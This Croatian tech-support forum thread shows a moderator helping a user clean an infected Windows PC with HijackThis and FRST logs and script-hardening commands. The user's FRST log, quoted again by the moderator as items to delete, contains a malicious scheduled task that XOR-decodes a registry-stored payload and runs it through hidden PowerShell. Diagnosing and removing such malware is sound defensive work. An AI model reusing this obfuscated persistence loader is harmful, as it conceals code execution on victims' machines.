Forumi


Povratak   PC Ekspert Forum > Računala > Software > Operativni sustavi
Ime
Lozinka

Odgovori
 
Uređivanje
Staro 23.07.2023., 22:45   #1291
domy_os
EMP moderator
 
domy_os's Avatar
 
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,381
Rekao bih da je neki malware u pitanju jer mi taj PowerShell task nije legit, stavi HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

Preventivno isključi pokretanje skripti, pokreni PowerShell kao admin pa pasteaj:

Code:
try {
	if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };
	if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };
}
catch { return $false }
return $true

# i na kraju

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted
__________________
"Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"

Nisu slomili u kratko vrijeme. Slamali su godinama, desetljećima pa i stoljećima. Svaka odgledana epizoda Big Brothera, svaki dečko koji ne zna niti promijeniti žarulju, a kamoli uzeti sjekiru i pocijepati drva, svaka cura koja misli da je briga za vlastitu obitelj robija, ali rad za par tisuća kuna u korporaciji 12 sati dnevno blagodat, svako promicanje terora političke korektnosti, svaka podrška promociji svih oblika poremećenosti… Sve to nas je dovelo do ovdje. Korona je samo zakucavanje lopte u gol nakon što je obrana već izigrana i golman odletio u prazno.




Lenovo ThinkPad T14 Gen 2 + Lenovo ThinkPad Universal Thunderbolt 4 Dock

CPU: Intel Core i7-1165G7 @ 2.8 GHz
RAM: 2 x 16 GB DDR4-3200
SSD: Samsung 970 EVO Plus 2 TB NVMe M.2
LCD: 14" FHD IPS 400nits Low Power
WLAN: Intel Wi-Fi 6 AX201
WWAN: Quectel EM120R-GL 4G LTE CAT12
OS: Windows 11 Pro

LCD monitor: AOC AG493UCX
Keyboard: Razer Huntsman V2 Analog
Mice: Logitech G502 Proteus Spectrum
SB: Mackie Onyx Producer 2x2
Speakers: 2 x JBL LSR305
MFP: Canon Pixma MP240
NAS: Synology DS420+ with 4 x WD Red Pro 8 TB
HDD Dock: LC Power LC-DOCK-U3-CR + 12 x Hitachi/Samsung/Seagate/WD 1/2 TB

domy_os je offline   Reply With Quote
Staro 24.07.2023., 02:18   #1292
fre@k
Premium
Moj komp
 
fre@k's Avatar
 
Datum registracije: Oct 2008
Lokacija: osijek
Postovi: 1,859
Citiraj:
Autor domy_os Pregled postova
Rekao bih da je neki malware u pitanju jer mi taj PowerShell task nije legit, stavi HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

Preventivno isključi pokretanje skripti, pokreni PowerShell kao admin pa pasteaj:

Code:
try {
	if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };
	if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };
}
catch { return $false }
return $true

# i na kraju

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted
Ukucao ovo u powershell i vratio mi je false

Citiraj:
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:16:50, on 24.7.2023.
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.19041.1566)


Boot mode: Normal

Running processes:
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Program Files\Logitech Gaming Software\ArxApplets\Discord\logitechg_discord.exe
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Users\Boris\Desktop\HijackThis.exe

O17 - HKLM\System\CCS\Services\Tcpip\..\{d7fde4bf-e111-4e9b-a6c9-d207412f0933}: NameServer = 213.191.128.8,213.191.128.9
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Inc. - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Genuine Software Monitor Service (AGMService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service: eID DCS (AkdEidDcs) - Unknown owner - C:\Program Files\AKD\eID Middleware\Dcs.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: AMD Crash Defender Service - Unknown owner - C:\WINDOWS\System32\amdfendrsr.exe (file missing)
O23 - Service: AMD External Events Utility - AMD - C:\WINDOWS\System32\DriverStore\FileRepository\u0379219.inf_amd64_3649648678001de4\B378972\atiesrxx.exe
O23 - Service: AnyDesk Service (AnyDesk) - AnyDesk Software GmbH - C:\Program Files (x86)\AnyDesk\AnyDesk.exe
O23 - Service: ASUS Com Service (asComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AXSP\4.00.42\atkexComSvc.exe
O23 - Service: @%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100 (CredentialEnrollmentManagerUserSvc) - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: CredentialEnrollmentManagerUserSvc_63b49 - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: Dropbox Update Service (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox Update Service (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: DbxSvc - Unknown owner - C:\WINDOWS\system32\DbxSvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: EG Station Information Service - Unknown owner - C:\Esko\bg_prog_egsis_v010\bin_ix86\egsissrv.exe
O23 - Service: Esko Subscription Service - Esko BVBA - C:\Program Files (x86)\Common Files\Esko\SubscriptionService\SubscriptionService\SubscriptionService.exe
O23 - Service: Everything - voidtools - C:\Program Files\Everything\Everything.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FLEXlm License Manager - Flexera - C:\Esko\bg_prog_system_v010\bin_ix86\lmgrd.exe
O23 - Service: FlexNet Licensing Service - Flexera - C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
O23 - Service: FlexNet Licensing Service 64 - Flexera - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Google Chrome Elevation Service (GoogleChromeElevationService) (GoogleChromeElevationService) - Google LLC - C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.199\elevation_service.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) PROSet Monitoring Service - Unknown owner - C:\Windows\system32\IProsetMonitor.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Logitech Gaming Registry Service (LogiRegistryService) - Logitech Inc. - C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @oem127.inf,%SERVICE_FRIENDLY_NAME%;Nahimic service (NahimicService) - Unknown owner - C:\WINDOWS\system32\NahimicService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: Corel License Validation Service V2, Powered by arvato (PSI_SVC_2) - arvato digital services llc - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: Realtek Audio Universal Service (RtkAudioUniversalService) - Unknown owner - C:\WINDOWS\System32\RtkAudUService64.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Samsung UPD Utility Service (SamsungUPDUtilSvc) - Unknown owner - C:\Windows\SysWOW64\SecUPDUtilSvc.exe
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\WINDOWS\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001 (Sense) - Unknown owner - C:\Program Files (x86)\Windows Defender Advanced Threat Protection\MsSense.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\SgrmBroker.exe,-100 (SgrmBroker) - Unknown owner - C:\WINDOWS\system32\SgrmBroker.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\WINDOWS\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: @oem126.inf,%ss_conn_launcher.SvcDesc%;SAMSUNG Mobile USB Connectivity Launcher (ss_conn_launcher_service) - Unknown owner - C:\WINDOWS\System32\Samsung\EasySetup\ss_conn_launcher.exe (file missing)
O23 - Service: SAMSUNG Mobile Connectivity Service (ss_conn_service) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
O23 - Service: SAMSUNG Mobile Connectivity Service V2 (ss_conn_service2) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\28_ssconn2\conn\ss_conn_service2.exe
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\steamservice.exe
O23 - Service: Adobe SwitchBoard (SwitchBoard) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: VirtualBox system service (VBoxSDS) - Oracle Corporation - C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wacom Professional Service (WTabletServicePro) - Wacom Co. Ltd. - C:\Program Files\Tablet\Wacom\WTabletServicePro.exe

--
End of file - 10226 bytes
__________________


CPU: I5 2500k
GPU: MSI TF 660 OC
MBO: Asrock Z68 PRO3
RAM: 2x4gb G. Skill (1333mhz)
PSU: Seasonic 620W
HDD: SSD 180gb Intel 520 | WD Green 2TB
CASE: CM Elite 370
Ostalo: MX518, Logitech Ultra Flat, DELL U2412M, Hyper 212+



Ako Vam je život tužan, ne brinite! Barem Vam je plaća smiješna
fre@k je offline   Reply With Quote
Staro 25.07.2023., 21:02   #1293
domy_os
EMP moderator
 
domy_os's Avatar
 
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,381
Ima li kakvih promjena? Ovime možeš skroz disableati script host...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue
U HJT logu ne vidim nešto sumnjivo, ali stavi logove i od FRST-a...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt.
__________________
"Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"

Nisu slomili u kratko vrijeme. Slamali su godinama, desetljećima pa i stoljećima. Svaka odgledana epizoda Big Brothera, svaki dečko koji ne zna niti promijeniti žarulju, a kamoli uzeti sjekiru i pocijepati drva, svaka cura koja misli da je briga za vlastitu obitelj robija, ali rad za par tisuća kuna u korporaciji 12 sati dnevno blagodat, svako promicanje terora političke korektnosti, svaka podrška promociji svih oblika poremećenosti… Sve to nas je dovelo do ovdje. Korona je samo zakucavanje lopte u gol nakon što je obrana već izigrana i golman odletio u prazno.




Lenovo ThinkPad T14 Gen 2 + Lenovo ThinkPad Universal Thunderbolt 4 Dock

CPU: Intel Core i7-1165G7 @ 2.8 GHz
RAM: 2 x 16 GB DDR4-3200
SSD: Samsung 970 EVO Plus 2 TB NVMe M.2
LCD: 14" FHD IPS 400nits Low Power
WLAN: Intel Wi-Fi 6 AX201
WWAN: Quectel EM120R-GL 4G LTE CAT12
OS: Windows 11 Pro

LCD monitor: AOC AG493UCX
Keyboard: Razer Huntsman V2 Analog
Mice: Logitech G502 Proteus Spectrum
SB: Mackie Onyx Producer 2x2
Speakers: 2 x JBL LSR305
MFP: Canon Pixma MP240
NAS: Synology DS420+ with 4 x WD Red Pro 8 TB
HDD Dock: LC Power LC-DOCK-U3-CR + 12 x Hitachi/Samsung/Seagate/WD 1/2 TB

domy_os je offline   Reply With Quote
Staro 30.07.2023., 10:12   #1294
pogi
aka Mali Mirko
Moj komp
 
pogi's Avatar
 
Datum registracije: Nov 2001
Lokacija: Rijeka
Postovi: 3,018
Što znače zelene kvačice na ikonama na desktopu?

pogi je offline   Reply With Quote
Staro 30.07.2023., 10:21   #1295
xlr
49%winner
Moj komp
 
xlr's Avatar
 
Datum registracije: Sep 2007
Lokacija: PU
Postovi: 8,702
Fajlovi/šortkati su syncani s Onedrive-om (ili nekim drugim cloudom/NAS-on - Dropbox, Synology...).
__________________
Keep calm and fastboot oem unlock.
xlr je offline   Reply With Quote
Staro 05.08.2023., 23:40   #1296
fre@k
Premium
Moj komp
 
fre@k's Avatar
 
Datum registracije: Oct 2008
Lokacija: osijek
Postovi: 1,859
Citiraj:
Autor domy_os Pregled postova
Ima li kakvih promjena? Ovime možeš skroz disableati script host...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue
U HJT logu ne vidim nešto sumnjivo, ali stavi logove i od FRST-a...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt.

Citiraj:
==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Znaci sve sam izguglao ali neznam uz cega je ovo vezano

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
__________________


CPU: I5 2500k
GPU: MSI TF 660 OC
MBO: Asrock Z68 PRO3
RAM: 2x4gb G. Skill (1333mhz)
PSU: Seasonic 620W
HDD: SSD 180gb Intel 520 | WD Green 2TB
CASE: CM Elite 370
Ostalo: MX518, Logitech Ultra Flat, DELL U2412M, Hyper 212+



Ako Vam je život tužan, ne brinite! Barem Vam je plaća smiješna
fre@k je offline   Reply With Quote
Staro 06.08.2023., 00:26   #1297
domy_os
EMP moderator
 
domy_os's Avatar
 
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,381
Ja bih ovo maknuo:

Code:
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
 
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
A ovo disableao pa enableaj ako bude problema sa zvukom:

Code:
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)

Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
__________________
"Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"

Nisu slomili u kratko vrijeme. Slamali su godinama, desetljećima pa i stoljećima. Svaka odgledana epizoda Big Brothera, svaki dečko koji ne zna niti promijeniti žarulju, a kamoli uzeti sjekiru i pocijepati drva, svaka cura koja misli da je briga za vlastitu obitelj robija, ali rad za par tisuća kuna u korporaciji 12 sati dnevno blagodat, svako promicanje terora političke korektnosti, svaka podrška promociji svih oblika poremećenosti… Sve to nas je dovelo do ovdje. Korona je samo zakucavanje lopte u gol nakon što je obrana već izigrana i golman odletio u prazno.




